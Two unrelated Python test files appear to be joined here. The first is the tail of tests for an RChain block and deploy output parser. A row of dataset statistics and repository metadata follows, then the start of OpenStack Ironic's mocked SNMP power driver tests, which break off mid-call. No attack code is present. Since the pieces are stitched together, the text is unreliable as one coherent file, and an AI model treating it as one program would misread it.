assert block.body_extra_bytes == ''
assert block.block_size == 20939
assert block.deploy_count == 1
assert block.fault_tolerance == -1.0
assert block.parents == ['a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394b', 'a0e9b7870112390da059ecf1d23636efb672a5e23aacb8ac9ade5cbd60ea394c']
assert block.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 79,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 52,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 56
}
deploy = block.deploys[0]
assert deploy.deployer == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert deploy.term == "@0!(2)"
assert deploy.timestamp == 1574992934035
assert deploy.sig == '3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605'
assert deploy.sig_algorithm == 'secp256k1'
assert deploy.phlo_price == 1
assert deploy.phlo_limit == 100000
assert deploy.valid_after_block_number == -1
assert deploy.cost == 0
assert deploy.error == 'false'
assert deploy.system_deploy_error == 'Deploy payment failed: Insufficient funds'
def test_parse_show_block_output_without_parents() -> None:
input = r'''blockInfo {
blockHash: "b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf"
sender: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
seqNum: 1
sig: "304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8"
sigAlgorithm: "secp256k1"
shardId: "rchain"
extraBytes: ""
version: 1
timestamp: 1574992953104
headerExtraBytes: ""
blockNumber: 1
preStateHash: "d602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8"
postStateHash: "62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1"
bodyExtraBytes: ""
bonds {
validator: "0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb"
stake: 79
}
bonds {
validator: "04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35"
stake: 52
}
bonds {
validator: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
stake: 56
}
blockSize: "20939"
deployCount: 1
faultTolerance: -1.0
}
deploys {
deployer: "04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519"
term: "@0!(2)"
timestamp: 1574992934035
sig: "3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605"
sigAlgorithm: "secp256k1"
phloPrice: 1
phloLimit: 100000
validAfterBlockNumber: -1
cost: 0
errored: false
systemDeployError: "Deploy payment failed: Insufficient funds"
}
'''
block = parse_show_block_output(input)
assert block.block_hash == 'b3e8560f42451ee20f62c3d3bf52d00aa12131876bdf4fb2ddb6ac80937edbaf'
assert block.sender == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert block.seq_num == 1
assert block.sig == '304502210086be15066503ab4cd0707f618e90eb65036eed374aa8f46c789939b93cc280c702201987cca65b56517e38629718063cb4e17f7dc07a35593ff27a19e58838b22fe8'
assert block.sig_algorithm == 'secp256k1'
assert block.shard_id == 'rchain'
assert block.extra_bytes == ''
assert block.version == '1'
assert block.timestamp == 1574992953104
assert block.header_extra_bytes == ''
assert block.block_number == 1
assert block.pre_state_hash == 'd602762105b18cbb30747979d860657f7dd3919791bdc5db237ece9c607933a8'
assert block.post_state_hash == '62bfc991fdc775b92252548fe06ddecdff2be024120d149a9596b3f334d798f1'
assert block.body_extra_bytes == ''
assert block.block_size == 20939
assert block.deploy_count == 1
assert block.fault_tolerance == -1.0
assert block.parents == []
assert block.bonds == {
'0444f16eee91c879a70a2d53e90b329670580395c8639ffef3f39ef74bdd9364279f877cd3d7cca806c815bd6fc568bf2fc0695a9c2cd6ac3d36fc1f4864243efb': 79,
'04ab4c08f1986bb40c57d6aa24a650a4122bd6afb6b77990a1447230fc428cefd1d8d51b75812e549e0e4f2289c8fea6389b1d26ce71a7204782d92ea6c9862a35': 52,
'04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519': 56
}
deploy = block.deploys[0]
assert deploy.deployer == '04ac75929e588b030989d216043d2c98117d50d863c4f6b7115d737509f2df848d7fec7ccae9a7c5a45ad94d151ec4372ab552dd8c27ae9ed09f085377ebee0519'
assert deploy.term == "@0!(2)"
assert deploy.timestamp == 1574992934035
assert deploy.sig == '3045022100994d74bfdb230d2af95d2090e3d9cd9020eb9c70224c2285585ea0f9a3aa406c022017ed317fe3e721626a9a1dea1804b0aeea5c32b627495dbbc8458e07ae5c1605'
assert deploy.sig_algorithm == 'secp256k1'
assert deploy.phlo_price == 1
assert deploy.phlo_limit == 100000
assert deploy.valid_after_block_number == -1
assert deploy.cost == 0
assert deploy.error == 'false'
assert deploy.system_deploy_error == 'Deploy payment failed: Insufficient funds'
def test_extract_block_hash_from_propose_output() -> None:
response = "Response: Success! Block a91208047c created and added.\n"
assert extract_block_hash_from_propose_output(response) == "a91208047c"
def test_make_wallets_file_lines() -> None:
wallets_map = {
PrivateKey.from_hex("80366db5fbb8dad7946f27037422715e4176dda41d582224db87b6c3b783d709"): 40,
PrivateKey.from_hex("120d42175739387af0264921bb117e4c4c05fbe2ce5410031e8b158c6e414bb5"): 45,
PrivateKey.from_hex("1f52d0bce0a92f5c79f2a88aae6d391ddf853e2eb8e688c5aa68002205f92dad"): 26
}
output = make_wallets_file_lines(wallets_map)
assert output == [
'26218db6e5a2eed1901f72cea58fda7ef1f602c6,40,0',
'42c828c183163cb50f6ad5207a10899b59aae91c,45,0',
'2a11fd494610330f3b522562f7204670f8928133,26,0',
]
def test_parse_mvdag_str() -> None:
input = """d5db034e82e10ee1037454a70737ac9e1a6f4900d28590776b5ccc5eef087312 a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7
a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7 9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8
3851ce1c5f7a26b444c45edde5cff7fae20aa5b90aa6ce882f058c7834d748d6 9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8
f591cea354b70a9c6b753d13d8912d7fd0219fd45b80f449a08431cb6b265ea2 9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8
9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8 b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907
879b1499c4bb5b8359559ab2a308ce76dd01ae1a3693f0edbdbf4a7126767d93 b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907
b52e9a808053703353a16ea85a4cda5820a2af115bad87b6cebfef03111f5541 b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907
b0880ca496258ebd0c8c36446ac7596681600e3ab90a9db44b464dd4767f5adf 9547694c620c3e78b39da3db3a2090aa863a0c1174686a4de105350f7d4e77f4"""
dag = parse_mvdag_str(input)
assert dag == {
"d5db034e82e10ee1037454a70737ac9e1a6f4900d28590776b5ccc5eef087312": set(['a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7']),
"a75e6ec04d42b3fa0a02160d0bd2d19cbe563016283f362eb114f19c0a2bbad7": set(['9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8']),
"3851ce1c5f7a26b444c45edde5cff7fae20aa5b90aa6ce882f058c7834d748d6": set(['9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8']),
"f591cea354b70a9c6b753d13d8912d7fd0219fd45b80f449a08431cb6b265ea2": set(['9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8']),
"9fa2d387275ff5019c26809e6d6b2ef6a250090892e3b9269fa303d19db15ee8": set(['b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907']),
"879b1499c4bb5b8359559ab2a308ce76dd01ae1a3693f0edbdbf4a7126767d93": set(['b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907']),
"b52e9a808053703353a16ea85a4cda5820a2af115bad87b6cebfef03111f5541": set(['b29aaeb2ae774bfa573c4e5e37bc84bbaa1616263fd83c820b0dd9a795a57907']),
"b0880ca496258ebd0c8c36446ac7596681600e3ab90a9db44b464dd4767f5adf": set(['9547694c620c3e78b39da3db3a2090aa863a0c1174686a4de105350f7d4e77f4']),
}
def test_parse_deploy_str() -> None:
input = """Response: Success!
DeployId is: 3045022100970e70a1e00751df2c4bb3475b1eae8ca15f81711dcdd89136608b0bc3d144ea022038f935b2dc7de76c8543bf89a8515469fcab55fdabf0ce907f40d211fae438a5
"""
deploy_id = extract_deploy_id_from_deploy_output(input)
assert deploy_id == "3045022100970e70a1e00751df2c4bb3475b1eae8ca15f81711dcdd89136608b0bc3d144ea022038f935b2dc7de76c8543bf89a8515469fcab55fdabf0ce907f40d211fae438a5"
| 48.317191 | 169 | 0.829416 | 1,081 | 19,955 | 15.139685 | 0.158187 | 0.025541 | 0.011732 | 0.007699 | 0.627765 | 0.610962 | 0.594464 | 0.54546 | 0.541733 | 0.541733 | 0 | 0.419756 | 0.101027 | 19,955 | 412 | 170 | 48.434466 | 0.492558 | 0.001704 | 0 | 0.603774 | 0 | 0 | 0.719056 | 0.566909 | 0 | 1 | 0 | 0 | 0.280323 | 1 | 0.021563 | false | 0 | 0.008086 | 0 | 0.02965 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c798e912b21323b31dcc25a0c5b4e6061f5b6c9 | 62,750 | py | Python | ironic/tests/unit/drivers/modules/test_snmp.py | hpproliant/ironic | 4f62cd97196b2a0068700ffb17456912147778d0 | [
"Apache-2.0"
] | null | null | null | ironic/tests/unit/drivers/modules/test_snmp.py | hpproliant/ironic | 4f62cd97196b2a0068700ffb17456912147778d0 | [
"Apache-2.0"
] | null | null | null | ironic/tests/unit/drivers/modules/test_snmp.py | hpproliant/ironic | 4f62cd97196b2a0068700ffb17456912147778d0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013,2014 Cray Inc
#
# Authors: David Hewson <dhewson@cray.com>
# Stig Telfer <stelfer@cray.com>
# Mark Goddard <mgoddard@cray.com>
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for SNMP power driver module."""
import time
import mock
from oslo_config import cfg
from pysnmp.entity.rfc3413.oneliner import cmdgen
from pysnmp import error as snmp_error
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.drivers.modules import snmp as snmp
from ironic.tests import base
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
CONF = cfg.CONF
INFO_DICT = db_utils.get_test_snmp_info()
@mock.patch.object(cmdgen, 'CommandGenerator', autospec=True)
class SNMPClientTestCase(base.TestCase):
def setUp(self):
super(SNMPClientTestCase, self).setUp()
self.address = '1.2.3.4'
self.port = '6700'
self.oid = 'oid'
self.value = 'value'
def test___init__(self, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V1)
mock_cmdgen.assert_called_once_with()
self.assertEqual(self.address, client.address)
self.assertEqual(self.port, client.port)
self.assertEqual(snmp.SNMP_V1, client.version)
self.assertIsNone(client.community)
self.assertFalse('security' in client.__dict__)
self.assertEqual(mock_cmdgen.return_value, client.cmd_gen)
@mock.patch.object(cmdgen, 'CommunityData', autospec=True)
def test__get_auth_v1(self, mock_community, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V1)
client._get_auth()
mock_cmdgen.assert_called_once_with()
mock_community.assert_called_once_with(client.community, mpModel=0)
@mock.patch.object(cmdgen, 'UsmUserData', autospec=True)
def test__get_auth_v3(self, mock_user, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
client._get_auth()
mock_cmdgen.assert_called_once_with()
mock_user.assert_called_once_with(client.security)
@mock.patch.object(cmdgen, 'UdpTransportTarget', autospec=True)
def test__get_transport(self, mock_transport, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
client._get_transport()
mock_cmdgen.assert_called_once_with()
mock_transport.assert_called_once_with((client.address, client.port))
@mock.patch.object(cmdgen, 'UdpTransportTarget', autospec=True)
def test__get_transport_err(self, mock_transport, mock_cmdgen):
mock_transport.side_effect = snmp_error.PySnmpError
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(snmp_error.PySnmpError, client._get_transport)
mock_cmdgen.assert_called_once_with()
mock_transport.assert_called_once_with((client.address, client.port))
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_get(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.getCmd.return_value = ("", None, 0, [var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
val = client.get(self.oid)
self.assertEqual(var_bind[1], val)
mock_cmdgenerator.getCmd.assert_called_once_with(mock.ANY, mock.ANY,
self.oid)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_get_err_transport(self, mock_auth, mock_transport, mock_cmdgen):
mock_transport.side_effect = snmp_error.PySnmpError
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.getCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure, client.get, self.oid)
self.assertFalse(mock_cmdgenerator.getCmd.called)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_get_err_engine(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.getCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure, client.get, self.oid)
mock_cmdgenerator.getCmd.assert_called_once_with(mock.ANY, mock.ANY,
self.oid)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_set(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.setCmd.return_value = ("", None, 0, [var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
client.set(self.oid, self.value)
mock_cmdgenerator.setCmd.assert_called_once_with(mock.ANY, mock.ANY,
var_bind)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_set_err_transport(self, mock_auth, mock_transport, mock_cmdgen):
mock_transport.side_effect = snmp_error.PySnmpError
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.setCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure,
client.set, self.oid, self.value)
self.assertFalse(mock_cmdgenerator.setCmd.called)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_set_err_engine(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.setCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure,
client.set, self.oid, self.value)
mock_cmdgenerator.setCmd.assert_called_once_with(mock.ANY, mock.ANY,
var_bind)
class SNMPValidateParametersTestCase(db_base.DbTestCase):
def _get_test_node(self, driver_info):
return obj_utils.get_test_node(
self.context,
driver_info=driver_info)
def test__parse_driver_info_default(self):
# Make sure we get back the expected things.
node = self._get_test_node(INFO_DICT)
info = snmp._parse_driver_info(node)
self.assertEqual(INFO_DICT['snmp_driver'], info.get('driver'))
self.assertEqual(INFO_DICT['snmp_address'], info.get('address'))
self.assertEqual(INFO_DICT['snmp_port'], str(info.get('port')))
self.assertEqual(INFO_DICT['snmp_outlet'], info.get('outlet'))
self.assertEqual(INFO_DICT['snmp_version'], info.get('version'))
self.assertEqual(INFO_DICT.get('snmp_community'),
info.get('community'))
self.assertEqual(INFO_DICT.get('snmp_security'),
info.get('security'))
def test__parse_driver_info_apc(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc', info.get('driver'))
def test__parse_driver_info_apc_masterswitch(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc_masterswitch')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc_masterswitch', info.get('driver'))
def test__parse_driver_info_apc_masterswitchplus(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc_masterswitchplus')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc_masterswitchplus', info.get('driver'))
def test__parse_driver_info_apc_rackpdu(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc_rackpdu')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc_rackpdu', info.get('driver'))
def test__parse_driver_info_aten(self):
# Make sure the Aten driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='aten')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('aten', info.get('driver'))
def test__parse_driver_info_cyberpower(self):
# Make sure the CyberPower driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='cyberpower')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('cyberpower', info.get('driver'))
def test__parse_driver_info_eatonpower(self):
# Make sure the Eaton Power driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='eatonpower')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('eatonpower', info.get('driver'))
def test__parse_driver_info_teltronix(self):
# Make sure the Teltronix driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='teltronix')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('teltronix', info.get('driver'))
def test__parse_driver_info_snmp_v1(self):
# Make sure SNMPv1 is parsed with a community string.
info = db_utils.get_test_snmp_info(snmp_version='1',
snmp_community='public')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('1', info.get('version'))
self.assertEqual('public', info.get('community'))
def test__parse_driver_info_snmp_v2c(self):
# Make sure SNMPv2c is parsed with a community string.
info = db_utils.get_test_snmp_info(snmp_version='2c',
snmp_community='private')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('2c', info.get('version'))
self.assertEqual('private', info.get('community'))
def test__parse_driver_info_snmp_v3(self):
# Make sure SNMPv3 is parsed with a security string.
info = db_utils.get_test_snmp_info(snmp_version='3',
snmp_security='pass')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('3', info.get('version'))
self.assertEqual('pass', info.get('security'))
def test__parse_driver_info_snmp_port_default(self):
# Make sure default SNMP UDP port numbers are correct
info = dict(INFO_DICT)
del info['snmp_port']
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual(161, info.get('port'))
def test__parse_driver_info_snmp_port(self):
# Make sure non-default SNMP UDP port numbers can be configured
info = db_utils.get_test_snmp_info(snmp_port='10161')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual(10161, info.get('port'))
def test__parse_driver_info_missing_driver(self):
# Make sure exception is raised when the driver type is missing.
info = dict(INFO_DICT)
del info['snmp_driver']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_invalid_driver(self):
# Make sure exception is raised when the driver type is invalid.
info = db_utils.get_test_snmp_info(snmp_driver='invalidpower')
node = self._get_test_node(info)
self.assertRaises(exception.InvalidParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_address(self):
# Make sure exception is raised when the address is missing.
info = dict(INFO_DICT)
del info['snmp_address']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_outlet(self):
# Make sure exception is raised when the outlet is missing.
info = dict(INFO_DICT)
del info['snmp_outlet']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_default_version(self):
# Make sure version defaults to 1 when it is missing.
info = dict(INFO_DICT)
del info['snmp_version']
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('1', info.get('version'))
self.assertEqual(INFO_DICT['snmp_community'], info.get('community'))
def test__parse_driver_info_invalid_version(self):
# Make sure exception is raised when version is invalid.
info = db_utils.get_test_snmp_info(snmp_version='42',
snmp_community='public',
snmp_security='pass')
node = self._get_test_node(info)
self.assertRaises(exception.InvalidParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_default_version_and_missing_community(self):
# Make sure exception is raised when version and community are missing.
info = dict(INFO_DICT)
del info['snmp_version']
del info['snmp_community']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_community_snmp_v1(self):
# Make sure exception is raised when community is missing with SNMPv1.
info = dict(INFO_DICT)
del info['snmp_community']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_community_snmp_v2c(self):
# Make sure exception is raised when community is missing with SNMPv2c.
info = db_utils.get_test_snmp_info(snmp_version='2c')
del info['snmp_community']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_security(self):
# Make sure exception is raised when security is missing with SNMPv3.
info = db_utils.get_test_snmp_info(snmp_version='3')
del info['snmp_security']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
@mock.patch.object(snmp, '_get_client', autospec=True)
class SNMPDeviceDriverTestCase(db_base.DbTestCase):
"""Tests for the SNMP device-specific driver classes.
The SNMP client object is mocked to allow various error cases to be tested.
"""
def setUp(self):
super(SNMPDeviceDriverTestCase, self).setUp()
self.node = obj_utils.get_test_node(
self.context,
driver='fake_snmp',
driver_info=INFO_DICT)
def _update_driver_info(self, **kwargs):
self.node["driver_info"].update(**kwargs)
def _set_snmp_driver(self, snmp_driver):
self._update_driver_info(snmp_driver=snmp_driver)
def _get_snmp_failure(self):
return exception.SNMPFailure(operation='test-operation',
error='test-error')
def test_power_state_on(self, mock_get_client):
# Ensure the power on state is queried correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def test_power_state_off(self, mock_get_client):
# Ensure the power off state is queried correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
def test_power_state_error(self, mock_get_client):
# Ensure an unexpected power state returns an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.ERROR, pstate)
def test_power_state_snmp_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a query are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_state)
mock_client.get.assert_called_once_with(driver._snmp_oid())
def test_power_on(self, mock_get_client):
# Ensure the device is powered on correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def test_power_off(self, mock_get_client):
# Ensure the device is powered off correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_on_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the state to change following a power on
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_off_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the state to change following a power off
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_on,
driver.value_power_off]
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_on_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power on
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_off_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power off
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
def test_power_on_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power on set operation
# are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_on)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
